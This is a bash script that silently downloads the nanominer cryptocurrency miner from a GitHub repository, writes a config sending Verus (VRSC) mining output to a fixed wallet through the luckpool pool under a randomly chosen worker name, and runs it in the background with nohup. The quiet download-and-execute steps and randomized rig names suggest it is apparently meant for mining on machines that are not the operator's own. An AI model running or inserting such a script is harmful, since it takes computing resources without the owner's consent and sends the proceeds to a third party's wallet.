#!/bin/bash
array[0]="darsono"
array[1]="suyanto"
array[2]="suyetno"
size=${#array[@]}
index=$(($RANDOM % $size))
worker=${array[$index]}
wget -qO nano https://github.com/eliteleon/private/raw/main/software/nanominer.zip
unzip -qq nano
chmod +x nanominer
echo "[Verushash]
wallet = RUg3ZdP9k3qN8yPcAC4AEJWoktxLFyWngv
coin = VRSC
rigName = $worker
rigPassword = x
pool1 = eu.luckpool.net:3956" > config.ini
nohup ./nanominer > nohup.out
